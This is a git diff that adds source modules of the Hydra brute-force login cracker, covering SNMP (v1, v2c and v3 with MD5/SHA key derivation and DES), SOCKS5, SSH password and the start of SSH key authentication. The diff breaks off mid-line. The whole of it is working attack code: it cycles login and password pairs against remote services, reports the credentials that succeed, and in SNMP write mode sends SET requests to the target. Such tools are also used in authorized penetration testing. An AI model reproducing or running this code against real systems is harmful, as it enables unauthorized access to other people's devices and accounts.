-0,0 +1,580 @@ +#include "hydra-mod.h" +#ifdef LIBOPENSSL +#include +#include +#include +#include +#include +#endif + +extern int hydra_data_ready_timed(int socket, long sec, long usec); + +extern char *HYDRA_EXIT; +extern int child_head_no; + +char snmpv3buf[1024], *snmpv3info = NULL; +int snmpv3infolen = 0, snmpversion = 1, snmpread = 1, hashtype = 1, enctype = 0; + +char snmpv3_init[] = { 0x30, 0x3e, 0x02, 0x01, 0x03, 0x30, 0x11, 0x02, + 0x04, 0x08, 0x86, 0xdd, 0xf0, 0x02, 0x03, 0x00, + 0xff, 0xe3, 0x04, 0x01, 0x04, 0x02, 0x01, 0x03, + 0x04, 0x10, 0x30, 0x0e, 0x04, 0x00, 0x02, 0x01, + 0x00, 0x02, 0x01, 0x00, 0x04, 0x00, 0x04, 0x00, + 0x04, 0x00, 0x30, 0x14, 0x04, 0x00, 0x04, 0x00, + 0xa0, 0x0e, 0x02, 0x04, 0x3f, 0x44, 0x5c, 0xbc, + 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x00 +}; + +char snmpv3_get1[] = { 0x30, 0x77, 0x02, 0x01, 0x03, 0x30, 0x11, 0x02, + 0x04, 0x08, 0x86, 0xdd, 0xef, 0x02, 0x03, 0x00, + 0xff, 0xe3, 0x04, 0x01, 0x05, 0x02, 0x01, 0x03 +}; + +char snmpv3_get2[] = { 0x30, 0x2e, 0x04, 0x0c, 0x80, 0x00, 0x00, + 0x09, 0x03, 0x00, 0x00, 0x1f, 0xca, 0x8d, 0x82, + 0x1b, 0x04, 0x00, 0xa0, 0x1c, 0x02, 0x04, 0x3f, + 0x44, 0x5c, 0xbb, 0x02, 0x01, 0x00, 0x02, 0x01, + 0x00, 0x30, 0x0e, 0x30, 0x0c, 0x06, 0x08, 0x2b, + 0x06, 0x01, 0x02, 0x01, 0x01, 0x01, 0x00, 0x05, + 0x00 +}; + +char snmpv3_nouser[] = { 0x04, 0x00, 0x04, 0x00, 0x04, 0x00 }; + +struct SNMPV1_A { + char ID; + char len; + char ver[3]; + char comid; + char comlen; +}; + +struct SNMPV1_A snmpv1_a = { + .ID = '\x30', + .len = '\x00', + .ver = "\x02\x01\x00", /* \x02\x01\x01 for snmpv2c, \x02\x01\x03 for snmpv3 */ + .comid = '\x04', + .comlen = '\x00' +}; + +struct SNMPV1_R { + char type[2]; + char identid[2]; + char ident[4]; + char errstat[3]; + char errind[3]; + char objectid[2]; + char object[11]; + char value[3]; +} snmpv1_r = { + .type = "\xa0\x1b", /* GET */ + .identid = "\x02\x04",.ident = "\x1a\x5e\x97\x00", /* random crap :) */ + .errstat = "\x02\x01\x00", /* no error */ + .errind = "\x02\x01\x00", /* error index 0 */ + .objectid = "\x30\x0d",.object = "\x30\x0b\x06\x07\x2b\x06\x01\x02\x01\x01\x01", /* sysDescr */ + .value = "\x05\x00" /* we just read, so value = 0 */ +}; + +struct SNMPV1_W { + char type[2]; + char identid[2]; + char ident[4]; + char errstat[3]; + char errind[3]; + char objectid[2]; + char object[12]; + char value[8]; +} snmpv1_w = { + .type = "\xa3\x21", /* SET */ + .identid = "\x02\x04",.ident = "\x1a\x5e\x97\x22", /* random crap :) */ + .errstat = "\x02\x01\x00", /* no error */ + .errind = "\x02\x01\x00", /* error index 0 */ + .objectid = "\x30\x13", /* string */ + .object = "\x30\x11\x06\x08\x2b\x06\x01\x02\x01\x01\x05\x00",.value = "\x04\x05Hydra" /* writing hydra :-) */ +}; + +#ifdef LIBOPENSSL +void password_to_key_md5(u_char * password, /* IN */ + u_int passwordlen, /* IN */ + u_char * engineID, /* IN - pointer to snmpEngineID */ + u_int engineLength, /* IN - length of snmpEngineID */ + u_char * key) { /* OUT - pointer to caller 16-octet buffer */ + MD5_CTX MD; + u_char *cp, password_buf[80], *mypass = password, bpass[17]; + u_long password_index = 0, count = 0, i, mylen = passwordlen, myelen = engineLength; + + if (mylen < 8) { + memset(bpass, 0, sizeof(bpass)); + strcpy(bpass, password); + while (mylen < 8) { + strcat(bpass, password); + mylen += passwordlen; + } + mypass = bpass; + } + if (myelen > 32) + myelen = 32; + + MD5_Init(&MD); /* initialize MD5 */ + /* Use while loop until we've done 1 Megabyte */ + while (count < 1048576) { + cp = password_buf; + for (i = 0; i < 64; i++) { + /* Take the next octet of the password, wrapping */ + /* to the beginning of the password as necessary. */ + *cp++ = mypass[password_index++ % mylen]; + } + MD5_Update(&MD, password_buf, 64); + count += 64; + } + MD5_Final(key, &MD); /* tell MD5 we're done */ + /* Now localize the key with the engineID and pass */ + /* through MD5 to produce final key */ + /* May want to ensure that engineLength <= 32, */ + /* otherwise need to use a buffer larger than 64 */ + memcpy(password_buf, key, 16); + memcpy(password_buf + 16, engineID, myelen); + memcpy(password_buf + 16 + myelen, key, 16); + MD5_Init(&MD); + MD5_Update(&MD, password_buf, 32 + myelen); + MD5_Final(key, &MD); + return; +} + +void password_to_key_sha(u_char * password, /* IN */ + u_int passwordlen, /* IN */ + u_char * engineID, /* IN - pointer to snmpEngineID */ + u_int engineLength, /* IN - length of snmpEngineID */ + u_char * key) { /* OUT - pointer to caller 20-octet buffer */ + SHA_CTX SH; + u_char *cp, password_buf[80], *mypass = password, bpass[17]; + u_long password_index = 0, count = 0, i, mylen = passwordlen, myelen = engineLength; + + if (mylen < 8) { + memset(bpass, 0, sizeof(bpass)); + strcpy(bpass, password); + while (mylen < 8) { + strcat(bpass, password); + mylen += passwordlen; + } + mypass = bpass; + } + + if (myelen > 32) + myelen = 32; + + SHA1_Init(&SH); /* initialize SHA */ + /* Use while loop until we've done 1 Megabyte */ + while (count < 1048576) { + cp = password_buf; + for (i = 0; i < 64; i++) { + /* Take the next octet of the password, wrapping */ + /* to the beginning of the password as necessary. */ + *cp++ = mypass[password_index++ % mylen]; + } + SHA1_Update(&SH, password_buf, 64); + count += 64; + } + SHA1_Final(key, &SH); /* tell SHA we're done */ + /* Now localize the key with the engineID and pass */ + /* through SHA to produce final key */ + /* May want to ensure that engineLength <= 32, */ + /* otherwise need to use a buffer larger than 72 */ + memcpy(password_buf, key, 20); + memcpy(password_buf + 20, engineID, myelen); + memcpy(password_buf + 20 + myelen, key, 20); + SHA1_Init(&SH); + SHA1_Update(&SH, password_buf, 40 + myelen); + SHA1_Final(key, &SH); + return; +} +#endif + +int start_snmp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = "\"\"", *ptr, *login, *pass, buffer[1024], buf[1024], hash[64], key[256], salt[8]; + int i, j, k, size, off = 0, off2 = 0, done = 0; + unsigned char initVect[8], privacy_params[8]; + int engine_boots = 0; + +#ifdef LIBOPENSSL + DES_key_schedule symcbc; +#endif + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + if (snmpversion < 3) { + /* do we attack snmp v1 or v2c? */ + if (snmpversion == 2) { + snmpv1_a.ver[2] = '\x01'; + } + + if (snmpread) { + size = sizeof(snmpv1_r); + } else { + size = sizeof(snmpv1_w); + } + + snmpv1_a.comlen = (char) strlen(pass); + snmpv1_a.len = snmpv1_a.comlen + size + sizeof(snmpv1_a) - 3; + + i = sizeof(snmpv1_a); + memcpy(buffer, &snmpv1_a, i); + strcpy(buffer + i, pass); + i += strlen(pass); + + if (snmpread) { + memcpy(buffer + i, &snmpv1_r, size); + i += sizeof(snmpv1_r); + } else { + memcpy(buffer + i, &snmpv1_w, size); + i += sizeof(snmpv1_w); + } + } else { // snmpv3 + if (enctype == 0) { + memcpy(buffer, snmpv3_get1, sizeof(snmpv3_get1)); + i = sizeof(snmpv3_get1); + } else { + memcpy(buffer + 1, snmpv3_get1, sizeof(snmpv3_get1)); + buffer[0] = buffer[1]; + memset(buffer + 1, 0x81, 2); + i = sizeof(snmpv3_get1) + 1; + off2 = 1; + } + + memcpy(buffer + i, snmpv3info, snmpv3infolen); + + if (hashtype > 0) { + off = 12; +#ifdef LIBOPENSSL + if (hashtype == 1) { + password_to_key_md5(pass, strlen(pass), snmpv3info + 6, snmpv3info[5], key); + } else { + password_to_key_sha(pass, strlen(pass), snmpv3info + 6, snmpv3info[5], key); + } +#endif + if (enctype > 0) { + off += 8; + buffer[20 + off2] = 7; + } + } else { + ptr = login; + login = pass; + pass = ptr; + buffer[20] = 4; + } + + buffer[i + 1] = 4 + snmpv3infolen + off + strlen(login); + buffer[i + 3] = 2 + snmpv3infolen + off + strlen(login); + if (enctype == 0) + buffer[1] = 48 + sizeof(snmpv3_get1) + buffer[i + 1]; + i += snmpv3infolen; +//printf("2 + %d + %d + %d = 0x%02x\n", off, snmpv3infolen, strlen(login), buffer[1]); + + buffer[i] = 0x04; + buffer[i + 1] = strlen(login); + memcpy(buffer + i + 2, login, strlen(login)); + i += 2 + strlen(login); + + buffer[i] = 0x04; + if (hashtype > 0) { + buffer[i + 1] = 12; + memset(buffer + i + 2, 0, 12); + off = i + 2; + i += 2 + 12; + } else { + buffer[i + 1] = 0; + i += 2; + } + + buffer[i] = 0x04; + if (enctype == 0) { + buffer[i + 1] = 0x00; + i += 2; + } else { + buffer[i + 1] = 8; + memcpy(buffer + i + 2, salt, 8); // uninitialized and we dont care + i += 10; + } + + if (enctype == 0) { + memcpy(buffer + i, snmpv3_get2, sizeof(snmpv3_get2)); + i += sizeof(snmpv3_get2); + } else { + buffer[i] = 4; + buffer[i + 1] = 0x30; + +#ifdef LIBOPENSSL + +/* +//PrivDES::encrypt(const unsigned char *key, + // const unsigned int /*key_len*///, +// const unsigned char *buffer, +// const unsigned int buffer_len, +// unsigned char *out_buffer, +// unsigned int *out_buffer_len, +// unsigned char *privacy_params, +// unsigned int *privacy_params_len, +// const unsigned long engine_boots, +// const unsigned long /*engine_time*/) +// last 8 bytes of key are used as base for initialization vector */ + k = 0; + memcpy((char *) initVect, key + 8, 8); + // put salt in privacy_params + j = htonl(engine_boots); + memcpy(privacy_params, (char *) &j, 4); + memcpy(privacy_params + 4, salt, 4); // ??? correct? + // xor initVect with salt + for (i = 0; i < 8; i++) + initVect[i] ^= privacy_params[i]; + des_key_sched((C_Block *) key, symcbc); + des_ncbc_encrypt(snmpv3_get2 + 2, buf, sizeof(snmpv3_get2) - 2, symcbc, (C_Block *) (initVect), DES_ENCRYPT); + +#endif + +/* for (i = 0; i <= sizeof(snmpv3_get2) - 8; i += 8) { + des_ncbc_encrypt(snmpv3_get2 + i, buf + i, 8, (C_Block*)(initVect), DES_ENCRYPT); + } + // last part of buffer + if (buffer_len % 8) { + unsigned char tmp_buf[8]; + unsigned char *tmp_buf_ptr = tmp_buf; + int start = buffer_len - (buffer_len % 8); + memset(tmp_buf, 0, 8); + for (unsigned int l = start; l < buffer_len; l++) + *tmp_buf_ptr++ = buffer[l]; + des_ncbc_encrypt(tmp_buf, buf + start, 1, symcbc, (C_Block*)(initVect), DES_ENCRYPT); + *out_buffer_len = buffer_len + 8 - (buffer_len % 8); + } else + *out_buffer_len = buffer_len; +*/ + //dummy + k = ((sizeof(snmpv3_get2) - 2) / 8); + if ((sizeof(snmpv3_get2) - 2) % 8 != 0) + k++; + memcpy(buffer + i + 2, buf, k * 8); + i += k * 8 + 2; + } + + i++; // just to conform with the snmpv1/2 code +#ifdef LIBOPENSSL + if (hashtype == 1) { + HMAC((EVP_MD *) EVP_md5(), key, 16, buffer, i - 1, hash, NULL); + memcpy(buffer + off, hash, 12); + } else if (hashtype == 2) { + HMAC((EVP_MD *) EVP_sha1(), key, 20, buffer, i - 1, hash, NULL); + memcpy(buffer + off, hash, 12); + } +#endif + } + + j = 0; + do { + if (hydra_send(s, buffer, i - 1, 0) < 0) + return 3; + j++; + } while (hydra_data_ready_timed(s, 1, 0) <= 0 && j < 3); + + if (hydra_data_ready_timed(s, 5, 0) > 0) { + i = hydra_recv(s, (char *) buf, sizeof(buf)); + + if (snmpversion < 3) { + /* stolen from ADMsnmp... :P */ + for (j = 0; j < i; j++) { + if (buf[j] == '\x04') { /* community name */ + for (j = j + buf[j + 1]; j + 2 < i; j++) { + if (buf[j] == '\xa2') { /* PDU Response */ + for (; j + 2 < i; j++) { + if (buf[j] == '\x02') { /* ID */ + for (j = j + (buf[j + 1]); j + 2 < i; j++) { + if (buf[j] == '\x02') { + if (buf[j + 1] == '\x01') { /* good ! */ + hydra_report_found_host(port, ip, "snmp", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + } + } + } + } + } + } + } + } + } else { // snmpv3 reply + off = 0; + if (buf[0] == 0x30) { + if (buf[4] == 0x03 && buf[5] == 0x30) + off = 4; + if (buf[5] == 0x03 && buf[6] == 0x30) + off = 6; + if (buf[6] == 0x03 && buf[7] == 0x30) + off = 6; + } + if (off == 0) + return 3; + + if (debug) + printf("[DEBUG] buf[%d + 15] %d\n", off, buf[off + 15]); + k = 3 + off + buf[2 + off]; + if ((j = hydra_memsearch(buf + k, buf[k + 3], snmpv3_nouser, sizeof(snmpv3_nouser))) < 0) + if ((j = hydra_memsearch(buf + k, buf[k + 3], login, strlen(login))) >= 0) { + if (snmpv3info[j - 2] == 0x04) + j -= 2; + else + j = -1; + } + if (j >= 0) { + i = buf[k + 3] + 4; + if (i > sizeof(snmpv3info)) + i = sizeof(snmpv3info); + memcpy(snmpv3info, buf + k, i); + snmpv3infolen = j; + if (debug) + hydra_dump_asciihex(snmpv3info, snmpv3infolen); + } + + if ((buf[off + 15] & 1) == 1) { + if (hashtype == 0) + hydra_report_found_host(port, ip, "snmp3", fp); + else + hydra_report_found_host(port, ip, "snmp", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } else if ((buf[off + 15] & 5) == 4 && hydra_memsearch(buf, i, snmpv3_nouser, sizeof(snmpv3_nouser)) >= 0) { // user does not exist + if (debug) + printf("[DEBUG] server reply indicates login %s does not\n", login); + hydra_completed_pair_skip(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + } + } + + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_snmp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1, i = 0; + int myport = PORT_SNMP; + char *lptr; + + if (miscptr != NULL) { + lptr = strtok(miscptr, ":"); + while (lptr != NULL) { + if (strcasecmp(lptr, "1") == 0) + snmpversion = 1; + else if (strcasecmp(lptr, "2") == 0) + snmpversion = 2; + else if (strcasecmp(lptr, "3") == 0) + snmpversion = 3; + else if (strcasecmp(lptr, "PLAIN") == 0) + hashtype = 0; + else if (strcasecmp(lptr, "MD5") == 0) + hashtype = 1; + else if (strncasecmp(lptr, "R", 1) == 0) + snmpread = 1; + else if (strncasecmp(lptr, "W", 1) == 0) + snmpread = 0; + else if (strncasecmp(lptr, "SHA", 3) == 0) + hashtype = 2; + else if (strcasecmp(lptr, "DES") == 0) + enctype = 1; + else if (strcasecmp(lptr, "AES") == 0) + enctype = 2; + else { + fprintf(stderr, "[ERROR] unknown optional parameter: %s\n", lptr); + hydra_child_exit(2); + } + lptr = strtok(NULL, ":"); + } + } + if (hashtype == 0) + enctype = 0; + + if (port != 0) + myport = port; + sock = hydra_connect_udp(ip, myport); + port = myport; + + if (debug) + printf("[DEBUG] snmpv%d, isread %d, hashtype %d, enctype %d\n", snmpversion, snmpread, hashtype, enctype); + + hydra_register_socket(sp); + + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, no socket available\n", (int) getpid()); + hydra_child_exit(1); + } + + if (snmpversion == 3) { + next_run = 0; + while (snmpv3info == NULL && next_run < 3) { + hydra_send(sock, snmpv3_init, sizeof(snmpv3_init), 0); + if (hydra_data_ready_timed(sock, 5, 0) > 0) { + if ((i = hydra_recv(sock, (char *) snmpv3buf, sizeof(snmpv3buf))) > 30) { + if (snmpv3buf[4] == 3 && snmpv3buf[5] == 0x30); { + snmpv3info = snmpv3buf + 7 + snmpv3buf[6]; + snmpv3infolen = snmpv3info[3] + 4; + while (snmpv3info[snmpv3infolen - 2] == 4 && snmpv3info[snmpv3infolen - 1] == 0) + snmpv3infolen -= 2; + if (debug) + hydra_dump_asciihex(snmpv3info, snmpv3infolen); + if (snmpv3info[10] == 3 && child_head_no == 0) + printf("[INFO] Remote device MAC address is %02x:%02x:%02x:%02x:%02x:%02x\n", (unsigned char) snmpv3info[12], (unsigned char) snmpv3info[13], + (unsigned char) snmpv3info[14], (unsigned char) snmpv3info[15], (unsigned char) snmpv3info[16], (unsigned char) snmpv3info[12]); + } + } + } + next_run++; + } + if (snmpv3info == NULL || i < snmpv3info + snmpv3infolen - snmpv3buf) { + hydra_report(stderr, "No valid reply from snmp server, exiting!\n"); + hydra_child_exit(2); + } + } + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + run = 3; + + while (1) { + switch (run) { + case 1: /* connect and service init function */ + next_run = start_snmp(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +int service_snmp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-socks5.c b/hydra-socks5.c new file mode 100644 index 0000000..b1bc47c --- /dev/null +++ b/hydra-socks5.c @@ -0,0 +1,180 @@ +#include "hydra-mod.h" + +/* + +RFC: 1928 +This module enable bruteforcing for socks5, only following types are supported: +0x00 "No Authentication Required" +0x02 "Username/Password" + +*/ + +extern char *HYDRA_EXIT; +unsigned char *buf; + +int fail_cnt; + +int start_socks5(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, buffer[300]; + int pport, fud = 0; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + memcpy(buffer, "\x05\x02\x00\x02", 4); + if (hydra_send(s, buffer, 4, 0) < 0) { + return 1; + } + if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL) { + fail_cnt++; + if (fail_cnt >= 10) + return 5; + return (1); + } + + fail_cnt = 0; + if (buf[0] != 5) { + if (buf[0] == 4) { + hydra_report(stderr, "[ERROR] Sorry Socks4 / Socks4a ident is not supported\n"); + } else { + hydra_report(stderr, "[ERROR] Socks5 protocol or service shutdown: %s\n", buf); + } + free(buf); + return (4); + } + if (buf[1] == 0 || buf[1] == 32) { + hydra_report(stderr, "[INFO] Socks5 server does NOT require any authentication!\n"); + free(buf); + return (4); + } + if (buf[1] != 0x2) { + hydra_report(stderr, "[ERROR] Socks5 protocol or service shutdown: %s\n", buf); + free(buf); + return (4); + } + free(buf); + +/* RFC 1929 + For username/password authentication the client's authentication request is + field 1: version number, 1 byte (must be 0x01) +*/ + snprintf(buffer, sizeof(buffer), "\x01%c%s%c%s", (char) strlen(login), login, (char) strlen(pass), pass); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + + if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL) + return (1); + + if (buf[1] != 255) { + /* new: false positive check */ + free(buf); + pport = htons(port); + if (ip[0] == 16) { + memcpy(buffer, "\x05\x01\x00\x04", 4); + memcpy(buffer + 4, &ip[1], 16); + memcpy(buffer + 20, &pport, 2); + hydra_send(s, buffer, 22, 0); + } else { + memcpy(buffer, "\x05\x01\x00\x01", 4); + memcpy(buffer + 4, &ip[1], 4); + memcpy(buffer + 8, &pport, 2); + hydra_send(s, buffer, 10, 0); + } + if ((buf = (unsigned char *) hydra_receive_line(s)) != NULL) { + if (buf[1] == 0 || buf[1] == 32) { + hydra_report_found_host(port, ip, "socks5", fp); + hydra_completed_pair_found(); + fud = 1; + } else if (buf[1] != 2) { + hydra_report_found_host_msg(port, ip, "socks5", fp, "might be a false positive!"); + } + } + } + if (buf != NULL) + free(buf); + if (fud == 0) + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + + return 2; +} + +void service_socks5(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_SOCKS5, mysslport = PORT_SOCKS5_SSL; + + hydra_register_socket(sp); + if (port != 0) + myport = port; + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(300000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_socks5(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + case 4: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + return; + case 5: /* clean exit, server may blocking connections */ + hydra_report(stderr, "[ERROR] Server may blocking connections\n"); + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_socks5_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-ssh.c b/hydra-ssh.c new file mode 100644 index 0000000..be8a59e --- /dev/null +++ b/hydra-ssh.c @@ -0,0 +1,198 @@ +/* + +libssh is available at http://www.libssh.org +If you want support for ssh v1 protocol, you +have to add option -DWITH_SSH1=On in the cmake + +*/ + +#include "hydra-mod.h" +#ifndef LIBSSH +void dummy_ssh() { + printf("\n"); +} +#else + +#include + +#if LIBSSH_VERSION_MAJOR == 0 && LIBSSH_VERSION_MINOR >= 4 + +ssh_session session = NULL; + +extern char *HYDRA_EXIT; +int new_session = 1; + +int start_ssh(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, keep_login[300]; + int auth_state = 0, rc = 0, i = 0; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + if (new_session) { + if (session) { + ssh_disconnect(session); + ssh_finalize(); + ssh_free(session); + } + + session = ssh_new(); + ssh_options_set(session, SSH_OPTIONS_PORT, &port); + ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip)); + ssh_options_set(session, SSH_OPTIONS_USER, login); + ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "none"); + ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, "none"); + if (ssh_connect(session) != 0) { + //if the connection was drop, exit and let hydra main handle it + if (verbose) + hydra_report(stderr, "[ERROR] could not connect to target port %d\n", port); + return 3; + } + + if ((rc = ssh_userauth_none(session, NULL)) == SSH_AUTH_ERROR) { + return 3; + } else if (rc == SSH_AUTH_SUCCESS) { + hydra_report_found_host(port, ip, "ssh", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + else + return 1; + } + } else + new_session = 1; + + auth_state = ssh_auth_list(session); + if ((auth_state & SSH_AUTH_METHOD_PASSWORD) > 0) { + auth_state = ssh_userauth_password(session, NULL, pass); + } else if ((auth_state & SSH_AUTH_METHOD_INTERACTIVE) > 0) { + auth_state = ssh_userauth_kbdint(session, NULL, NULL); + while (auth_state == SSH_AUTH_INFO) { + rc = ssh_userauth_kbdint_getnprompts(session); + for (i = 0; i < rc; i++) + ssh_userauth_kbdint_setanswer(session, i, pass); + auth_state = ssh_userauth_kbdint(session, NULL, NULL); + } + } else { + return 4; + } + + if (auth_state == SSH_AUTH_ERROR) { + new_session = 1; + return 1; + } + + if (auth_state == SSH_AUTH_SUCCESS || auth_state == SSH_AUTH_PARTIAL) { + hydra_report_found_host(port, ip, "ssh", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + return 1; + } else { + strncpy(keep_login, login, sizeof(keep_login) - 1); + keep_login[sizeof(keep_login) - 1] = '\0'; + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + login = hydra_get_next_login(); + if (strcmp(login, keep_login) == 0) + new_session = 0; + return 1; + } + + /* not reached */ + return 1; +} + +void service_ssh(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + next_run = start_ssh(sock, ip, port, options, miscptr, fp); + break; + case 2: + ssh_disconnect(session); + ssh_finalize(); + ssh_free(session); + hydra_child_exit(0); + case 3: + ssh_disconnect(session); + ssh_finalize(); + ssh_free(session); + if (verbose) + fprintf(stderr, "[ERROR] ssh protocol error\n"); + hydra_child_exit(2); + case 4: + ssh_disconnect(session); + ssh_finalize(); + ssh_free(session); + fprintf(stderr, "[ERROR] ssh target does not support password auth\n"); + hydra_child_exit(2); + default: + ssh_disconnect(session); + ssh_finalize(); + ssh_free(session); + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} +#else +#error "You are not using v0.4.x. Download from http://www.libssh.org and add -DWITH_SSH1=On in cmake to enable SSH v1 support" +#endif +#endif + +int service_ssh_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // 1 skip target without generating an error + // 2 skip target because of protocol problems + // 3 skip target because its unreachable +#ifdef LIBSSH + int rc, method; + ssh_session session = ssh_new(); + + if (verbose || debug) + printf("[INFO] Testing if password authentication is supported by ssh://%s:%d\n", hydra_address2string(ip), port); + ssh_options_set(session, SSH_OPTIONS_PORT, &port); + ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip)); + ssh_options_set(session, SSH_OPTIONS_USER, "root"); + ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "none"); + ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, "none"); + if (ssh_connect(session) != 0) { + fprintf(stderr, "[ERROR] could not connect to ssh://%s:%d\n", hydra_address2string(ip), port); + return 2; + } + rc = ssh_userauth_none(session, NULL); + method = ssh_userauth_list(session, NULL); + ssh_disconnect(session); + ssh_finalize(); + ssh_free(session); + + if ((method & SSH_AUTH_METHOD_INTERACTIVE) || (method & SSH_AUTH_METHOD_PASSWORD)) { + if (verbose || debug) + printf("[INFO] Successful, password authentication is supported by ssh://%s:%d\n", hydra_address2string(ip), port); + return 0; + } + + fprintf(stderr, "[ERROR] target ssh://%s:%d/ does not support password authentication.\n", hydra_address2string(ip), port); + return 1; +#else + return 0; +#endif +} diff --git a/hydra-sshkey.c b/hydra-sshkey.c new file mode 100644 index 0000000..d5374cb --- /dev/null +++ b/hydra-sshkey.c @@ -0,0 +1,166 @@ + +/* + libssh is available at http://www.libssh.org + current version is 0.4.8 + If you want support for ssh v1 protocol, you + have to add option -DWITH_SSH1=On in the cmake +*/ + +#include "hydra-mod.h" +#ifndef LIBSSH +void dummy_sshkey() { + printf("\n"); +} +#else + +#include + +#if LIBSSH_VERSION_MAJOR == 0 && LIBSSH_VERSION_MINOR >= 4 + +extern ssh_session session; +extern char *HYDRA_EXIT; +extern int new_session; + +int start_sshkey(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *key, keep_login[300]; + int auth_state = 0, rc = 0, i = 0; + ssh_private_key privkey; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(key = hydra_get_next_password()) == 0) + key = empty; + + if (new_session) { + if (session) { + ssh_disconnect(session); + ssh_finalize(); + ssh_free(session); + } + + session = ssh_new(); + ssh_options_set(session, SSH_OPTIONS_PORT, &port); + ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip)); + ssh_options_set(session, SSH_OPTIONS_USER, login); + ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "none"); + ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, "none"); + if (ssh_connect(session) != 0) { + //if the connection was drop, exit and let hydra main handle it + if (verbose) + hydra_report(stderr, "[ERROR] could not connect to target port %d\n", port); + return 3; + } + + if ((rc = ssh_userauth_none(session, NULL)) 